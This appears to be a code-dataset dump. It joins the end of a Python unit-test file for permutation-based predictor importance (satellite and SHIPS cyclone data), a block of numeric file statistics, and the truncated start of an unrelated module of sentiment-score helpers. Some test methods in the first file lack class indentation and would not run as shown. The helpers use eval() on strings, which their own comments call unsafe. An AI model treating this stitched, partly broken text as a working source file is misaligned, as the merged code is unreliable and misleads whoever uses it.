NUM_BUILTIN_SHIPS_LAG_TIMES = permutation.NUM_BUILTIN_SHIPS_LAG_TIMES
NUM_SHIPS_FORECAST_HOURS = permutation.NUM_SHIPS_FORECAST_HOURS
# Predictor counts used to size the synthetic matrices below.
NUM_LAGGED_PREDICTORS = 17
NUM_FORECAST_PREDICTORS = 125
NUM_UNGRIDDED_SAT_PREDICTORS = 16
# The following constants are used to test _permute_values and
# _depermute_values.
# Synthetic standard-normal predictor matrices (examples x ... x variables).
PREDICTOR_MATRIX_GRIDDED_SAT = numpy.random.normal(
    loc=0., scale=1., size=(10, 640, 480, 4, 1)
)
PREDICTOR_MATRIX_UNGRIDDED_SAT = numpy.random.normal(
    loc=0., scale=1., size=(10, 4, NUM_UNGRIDDED_SAT_PREDICTORS)
)
PREDICTOR_MATRIX_SHIPS = numpy.random.normal(
    loc=0., scale=1., size=(10, 3, 193)
)
# Minimal training-options dict: placeholder predictor names whose lengths
# match the predictor counts above.
TRAINING_OPTION_DICT = {
    neural_net.SATELLITE_LAG_TIMES_KEY: numpy.array([0], dtype=int),
    neural_net.SHIPS_PREDICTORS_LAGGED_KEY: ['a'] * NUM_LAGGED_PREDICTORS,
    neural_net.SHIPS_PREDICTORS_FORECAST_KEY: ['b'] * NUM_FORECAST_PREDICTORS,
    neural_net.SATELLITE_PREDICTORS_KEY: ['c'] * NUM_UNGRIDDED_SAT_PREDICTORS
}
MODEL_METADATA_DICT = {
    neural_net.TRAINING_OPTIONS_KEY: TRAINING_OPTION_DICT
}
# The following constants are used to test _predictor_indices_to_metadata.
FIRST_RESULT_DICT = {
    permutation.PERMUTED_MATRICES_KEY: numpy.array([0, 1, 2], dtype=int),
    permutation.PERMUTED_VARIABLES_KEY: numpy.array([0, 10, 15], dtype=int)
}
FIRST_PREDICTOR_NAMES = [satellite_utils.BRIGHTNESS_TEMPERATURE_KEY, 'c', 'a']
SECOND_RESULT_DICT = {
    permutation.PERMUTED_MATRICES_KEY: numpy.array([0, 1, 2], dtype=int),
    permutation.PERMUTED_VARIABLES_KEY: numpy.array([0, 10, 100], dtype=int)
}
SECOND_PREDICTOR_NAMES = [satellite_utils.BRIGHTNESS_TEMPERATURE_KEY, 'c', 'b']
class PermutationTests(unittest.TestCase):
"""Each method is a unit test for permutation.py."""
def test_permute_values_gridded_sat_all_lags(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains gridded satellite data and
permutation is over all lag times.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_gridded_sat_one_lag(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains gridded satellite data and
permutation is over one lag time only.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
))
num_lag_times = new_predictor_matrix.shape[-2]
indices_to_compare = numpy.arange(num_lag_times) != 1
self.assertTrue(numpy.allclose(
new_predictor_matrix[..., indices_to_compare, :],
PREDICTOR_MATRIX_GRIDDED_SAT[..., indices_to_compare, :],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ungridded_sat_all_lags(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains ungridded satellite data and
permutation is over all lag times.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
))
num_variables = new_predictor_matrix.shape[-1]
indices_to_compare = numpy.arange(num_variables) != 0
self.assertTrue(numpy.allclose(
new_predictor_matrix[..., indices_to_compare],
PREDICTOR_MATRIX_UNGRIDDED_SAT[..., indices_to_compare],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ungridded_sat_one_lag(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains ungridded satellite data and
permutation is over one lag time.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
))
num_variables = new_predictor_matrix.shape[-1]
second_indices = numpy.arange(num_variables) != 0
num_lag_times = new_predictor_matrix.shape[-2]
first_indices = numpy.arange(num_lag_times) != 1
self.assertTrue(numpy.allclose(
new_predictor_matrix[..., second_indices][..., first_indices, :],
PREDICTOR_MATRIX_UNGRIDDED_SAT[
..., second_indices
][..., first_indices, :],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ships_all_lags_lagged(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over all lag times; and a predictor with built-in lags is permuted.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None, permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
new_lagged_matrix_4d, new_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=new_predictor_matrix,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
self.assertTrue(numpy.allclose(
new_forecast_matrix_4d, orig_forecast_matrix_4d, atol=TOLERANCE
))
num_variables = new_lagged_matrix_4d.shape[-1]
indices_to_compare = numpy.arange(num_variables) != 0
self.assertTrue(numpy.allclose(
new_lagged_matrix_4d[..., indices_to_compare],
orig_lagged_matrix_4d[..., indices_to_compare],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ships_one_lag_lagged(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over one lag time; and a predictor with built-in lags is permuted.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1, permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
new_lagged_matrix_4d, new_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=new_predictor_matrix,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
self.assertTrue(numpy.allclose(
new_forecast_matrix_4d, orig_forecast_matrix_4d, atol=TOLERANCE
))
num_variables = new_lagged_matrix_4d.shape[-1]
second_indices = numpy.arange(num_variables) != 0
num_lag_times = new_lagged_matrix_4d.shape[-2]
first_indices = numpy.arange(num_lag_times) != 1
self.assertTrue(numpy.allclose(
new_lagged_matrix_4d[..., second_indices][..., first_indices, :],
orig_lagged_matrix_4d[..., second_indices][..., first_indices, :],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ships_all_lags_forecast(self):
    """Ensures correct output from _permute_values.

    In this case, the predictor matrix contains SHIPS data; permutation is
    over all lag times; and a predictor with built-in forecast hours is
    permuted.
    """

    # Permute the first forecast-type predictor (its variable index is
    # NUM_LAGGED_PREDICTORS, i.e., it comes right after the lagged
    # predictors) over all model lag times.  `+ 0.` forces a copy so the
    # module-level matrix is not modified in place.
    new_predictor_matrix, permuted_value_matrix = (
        permutation._permute_values(
            predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
            predictor_type_enum=2,
            variable_index=NUM_LAGGED_PREDICTORS,
            model_metadata_dict=MODEL_METADATA_DICT,
            model_lag_time_index=None, permuted_value_matrix=None
        )
    )

    # Permutation must have changed something.
    self.assertFalse(numpy.allclose(
        new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
    ))

    # Split permuted and clean matrices into lagged and forecast components
    # so the two groups can be checked independently.
    new_lagged_matrix_4d, new_forecast_matrix_4d = (
        neural_net.ships_predictors_3d_to_4d(
            predictor_matrix_3d=new_predictor_matrix,
            num_lagged_predictors=NUM_LAGGED_PREDICTORS,
            num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
            num_forecast_predictors=NUM_FORECAST_PREDICTORS,
            num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
        )
    )

    orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
        neural_net.ships_predictors_3d_to_4d(
            predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
            num_lagged_predictors=NUM_LAGGED_PREDICTORS,
            num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
            num_forecast_predictors=NUM_FORECAST_PREDICTORS,
            num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
        )
    )

    # A forecast predictor was permuted, so lagged predictors must be
    # completely untouched.
    self.assertTrue(numpy.allclose(
        new_lagged_matrix_4d, orig_lagged_matrix_4d, atol=TOLERANCE
    ))

    # All forecast predictors except the permuted one (last-axis index 0)
    # must match the originals.
    num_variables = new_forecast_matrix_4d.shape[-1]
    indices_to_compare = numpy.arange(num_variables) != 0

    self.assertTrue(numpy.allclose(
        new_forecast_matrix_4d[..., indices_to_compare],
        orig_forecast_matrix_4d[..., indices_to_compare],
        atol=TOLERANCE
    ))

    # Re-running with the saved permuted_value_matrix must reproduce exactly
    # the same permuted matrix (determinism of the saved permutation).
    newnew_predictor_matrix = permutation._permute_values(
        predictor_matrix=new_predictor_matrix + 0.,
        predictor_type_enum=2,
        variable_index=NUM_LAGGED_PREDICTORS,
        model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=None,
        permuted_value_matrix=permuted_value_matrix
    )[0]

    self.assertTrue(numpy.allclose(
        new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
    ))
def test_permute_values_ships_one_lag_forecast(self):
    """Ensures correct output from _permute_values.

    In this case, the predictor matrix contains SHIPS data; permutation is
    over one lag time; and a predictor with built-in forecast hours is
    permuted.
    """

    # Permute the first forecast-type predictor at model lag time 1 only.
    # `+ 0.` forces a copy so the module-level matrix is not modified.
    new_predictor_matrix, permuted_value_matrix = (
        permutation._permute_values(
            predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
            predictor_type_enum=2,
            variable_index=NUM_LAGGED_PREDICTORS,
            model_metadata_dict=MODEL_METADATA_DICT,
            model_lag_time_index=1, permuted_value_matrix=None
        )
    )

    # Permutation must have changed something.
    self.assertFalse(numpy.allclose(
        new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
    ))

    # Split permuted and clean matrices into lagged and forecast components.
    new_lagged_matrix_4d, new_forecast_matrix_4d = (
        neural_net.ships_predictors_3d_to_4d(
            predictor_matrix_3d=new_predictor_matrix,
            num_lagged_predictors=NUM_LAGGED_PREDICTORS,
            num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
            num_forecast_predictors=NUM_FORECAST_PREDICTORS,
            num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
        )
    )

    orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
        neural_net.ships_predictors_3d_to_4d(
            predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
            num_lagged_predictors=NUM_LAGGED_PREDICTORS,
            num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
            num_forecast_predictors=NUM_FORECAST_PREDICTORS,
            num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
        )
    )

    # A forecast predictor was permuted, so lagged predictors must be
    # completely untouched.
    self.assertTrue(numpy.allclose(
        new_lagged_matrix_4d, orig_lagged_matrix_4d, atol=TOLERANCE
    ))

    # Everything except (variable 0, model lag time 1) in the forecast
    # component must match the originals.  The two indexing steps are applied
    # in sequence: first drop variable 0 on the last axis, then drop lag
    # time 1 on the second-to-last axis -- the order matters.
    num_variables = new_forecast_matrix_4d.shape[-1]
    second_indices = numpy.arange(num_variables) != 0

    num_lag_times = new_forecast_matrix_4d.shape[-2]
    first_indices = numpy.arange(num_lag_times) != 1

    self.assertTrue(numpy.allclose(
        new_forecast_matrix_4d[..., second_indices][..., first_indices, :],
        orig_forecast_matrix_4d[..., second_indices][..., first_indices, :],
        atol=TOLERANCE
    ))

    # Re-running with the saved permuted_value_matrix must reproduce exactly
    # the same permuted matrix (determinism of the saved permutation).
    newnew_predictor_matrix = permutation._permute_values(
        predictor_matrix=new_predictor_matrix + 0.,
        predictor_type_enum=2,
        variable_index=NUM_LAGGED_PREDICTORS,
        model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=1,
        permuted_value_matrix=permuted_value_matrix
    )[0]

    self.assertTrue(numpy.allclose(
        new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
    ))
def test_depermute_values_gridded_sat_all_lags(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains gridded satellite data and
    permutation is over all lag times.
    """

    # Shuffle the first variable over all lag times, then undo the shuffle
    # and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
        predictor_type_enum=0,
        variable_index=0, model_lag_time_index=None,
        permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT,
        predictor_type_enum=0,
        variable_index=0, model_lag_time_index=None
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
    ))
def test_depermute_values_gridded_sat_one_lag(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains gridded satellite data and
    permutation is over one lag time.
    """

    # Shuffle the first variable at lag time 1 only, then undo the shuffle
    # and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
        predictor_type_enum=0,
        variable_index=0, model_lag_time_index=1,
        permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT,
        predictor_type_enum=0,
        variable_index=0, model_lag_time_index=1
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
    ))
def test_depermute_values_ungridded_sat_all_lags(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains ungridded satellite data and
    permutation is over all lag times.
    """

    # Shuffle the first variable over all lag times, then undo the shuffle
    # and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
        predictor_type_enum=1,
        variable_index=0, model_lag_time_index=None,
        permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT,
        predictor_type_enum=1,
        variable_index=0, model_lag_time_index=None
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
    ))
def test_depermute_values_ungridded_sat_one_lag(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains ungridded satellite data and
    permutation is over one lag time.
    """

    # Shuffle the first variable at lag time 1 only, then undo the shuffle
    # and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
        predictor_type_enum=1,
        variable_index=0, model_lag_time_index=1,
        permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT,
        predictor_type_enum=1,
        variable_index=0, model_lag_time_index=1
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
    ))
def test_depermute_values_ships_all_lags_lagged(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains SHIPS data; permutation is
    over all lag times; and a predictor with built-in lags is permuted.
    """

    # Shuffle the first lagged predictor over all model lag times, then undo
    # the shuffle and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
        predictor_type_enum=2,
        variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=None, permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
        predictor_type_enum=2,
        variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=None
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
    ))
def test_depermute_values_ships_one_lag_lagged(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains SHIPS data; permutation is
    over one lag time; and a predictor with built-in lags is permuted.
    """

    # Shuffle the first lagged predictor at model lag time 1 only, then undo
    # the shuffle and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
        predictor_type_enum=2,
        variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=1, permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
        predictor_type_enum=2,
        variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=1
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
    ))
def test_depermute_values_ships_all_lags_forecast(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains SHIPS data; permutation is
    over all lag times; and a predictor with built-in forecast hours is
    permuted.
    """

    # Shuffle the first forecast predictor (variable index
    # NUM_LAGGED_PREDICTORS) over all model lag times, then undo the shuffle
    # and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
        predictor_type_enum=2,
        variable_index=NUM_LAGGED_PREDICTORS,
        model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=None, permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
        predictor_type_enum=2,
        variable_index=NUM_LAGGED_PREDICTORS,
        model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=None
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
    ))
def test_depermute_values_ships_one_lag_forecast(self):
    """Ensures correct output from _depermute_values.

    In this case, the predictor matrix contains SHIPS data; permutation is
    over one lag time; and a predictor with built-in forecast hours is
    permuted.
    """

    # Shuffle the first forecast predictor (variable index
    # NUM_LAGGED_PREDICTORS) at model lag time 1 only, then undo the shuffle
    # and verify that the clean matrix is recovered exactly.
    shuffled_matrix = permutation._permute_values(
        predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
        predictor_type_enum=2,
        variable_index=NUM_LAGGED_PREDICTORS,
        model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=1, permuted_value_matrix=None
    )[0]

    recovered_matrix = permutation._depermute_values(
        predictor_matrix=shuffled_matrix,
        clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
        predictor_type_enum=2,
        variable_index=NUM_LAGGED_PREDICTORS,
        model_metadata_dict=MODEL_METADATA_DICT,
        model_lag_time_index=1
    )

    self.assertTrue(numpy.allclose(
        recovered_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
    ))
def test_predictor_indices_to_metadata_first(self):
    """Ensures correct output from _predictor_indices_to_metadata.

    In this case, using first set of results.
    """

    # Translate the first one-step result dictionary into predictor names
    # and compare against the expected list.
    predictor_names = permutation._predictor_indices_to_metadata(
        model_metadata_dict=MODEL_METADATA_DICT,
        one_step_result_dict=FIRST_RESULT_DICT
    )

    self.assertEqual(predictor_names, FIRST_PREDICTOR_NAMES)
def test_predictor_indices_to_metadata_second(self):
    """Ensures correct output from _predictor_indices_to_metadata.

    In this case, using second set of results.
    """
    # NOTE(review): the original docstring said "first set of results" --
    # clearly a copy-paste slip, since this test uses SECOND_RESULT_DICT and
    # SECOND_PREDICTOR_NAMES.

    these_predictor_names = permutation._predictor_indices_to_metadata(
        model_metadata_dict=MODEL_METADATA_DICT,
        one_step_result_dict=SECOND_RESULT_DICT
    )

    self.assertTrue(these_predictor_names == SECOND_PREDICTOR_NAMES)
# Run the unit tests when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 37.911234
| 80
| 0.672459
| 3,087
| 27,334
| 5.483965
| 0.044704
| 0.181641
| 0.079745
| 0.070884
| 0.944297
| 0.938567
| 0.926458
| 0.913108
| 0.899817
| 0.897868
| 0
| 0.012392
| 0.264872
| 27,334
| 720
| 81
| 37.963889
| 0.830099
| 0.116851
| 0
| 0.757396
| 0
| 0
| 0.000636
| 0
| 0
| 0
| 0
| 0
| 0.072978
| 1
| 0.035503
| false
| 0
| 0.009862
| 0
| 0.047337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f74b2c6975850311018737bd1e518ede8c16aab
| 2,912
|
py
|
Python
|
valence/scripts/feature_extraction/stats.py
|
gizemsogancioglu/elderly-emotion-SC
|
b8f371e0df6e4aa8b680d59995cd18d52f591466
|
[
"MIT"
] | 2
|
2020-08-05T11:44:30.000Z
|
2021-02-19T15:46:10.000Z
|
valence/scripts/feature_extraction/stats.py
|
gizemsogancioglu/elderly-emotion-SC
|
b8f371e0df6e4aa8b680d59995cd18d52f591466
|
[
"MIT"
] | null | null | null |
valence/scripts/feature_extraction/stats.py
|
gizemsogancioglu/elderly-emotion-SC
|
b8f371e0df6e4aa8b680d59995cd18d52f591466
|
[
"MIT"
] | 2
|
2020-08-31T02:42:15.000Z
|
2020-10-29T15:39:48.000Z
|
import json

import numpy as np
import pandas as pd
def calc_min_from_list(score_list):
    """Return the smallest score in a serialized list of (word, pos, score) tuples."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    scores = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])['score']
    return scores.min()
def calc_max_from_list(score_list):
    """Return the largest score in a serialized list of (word, pos, score) tuples."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    scores = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])['score']
    return scores.max()
def calc_mean_from_list(score_list):
    """Return the mean score in a serialized list of (word, pos, score) tuples."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    scores = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])['score']
    return scores.mean()
def calc_sum_from_list(score_list):
    """Return the sum of scores in a serialized list of (word, pos, score) tuples."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    scores = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])['score']
    return scores.sum()
def calc_num_from_list(score_list):
    """Return the number of (word, pos, score) entries in the serialized list."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    entries = eval(score_list)
    return len(entries)
def calc_num_pos_from_list(score_list):
    """Return how many entries have a strictly positive score."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    frame = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
    return len(frame.loc[frame['score'] > 0])
def calc_num_neg_from_list(score_list):
    """Return how many entries have a strictly negative score."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    frame = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
    return len(frame.loc[frame['score'] < 0])
def calc_range_from_list(score_list):
    """Return max score minus min score for a serialized (word, pos, score) list."""
    # NOTE(review): eval() on externally supplied text is unsafe; consider
    # ast.literal_eval if these strings can come from untrusted sources.
    scores = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])['score']
    return scores.max() - scores.min()
def calc_sum_from_dict(score_dict):
    """Sum the values of a score dictionary.

    :param score_dict: Either a dict of scores or its single-quoted string
        serialization (e.g. "{'good': 1.0}").
    :return: Sum of the values, or numpy.nan if the dict is empty, falsy, or
        the string cannot be parsed.
    """
    # Bug fix: the module originally never imported json, so the json.loads
    # call always raised NameError, the bare `except: pass` swallowed it, and
    # string input then crashed on str.keys().  `json` is now imported at
    # module level, and only parse errors are caught.
    if isinstance(score_dict, str):
        try:
            # Serialized dicts use single quotes; JSON requires double quotes.
            score_dict = json.loads(score_dict.replace('\'', '\"'))
        except ValueError:
            return np.nan

    if not score_dict:
        return np.nan

    return sum(score_dict.values())
def calc_min_from_dict(score_dict):
    """Return the smallest value in a score dictionary.

    :param score_dict: Either a dict of scores or its single-quoted string
        serialization.
    :return: Minimum value, or numpy.nan if the dict is empty, falsy, or the
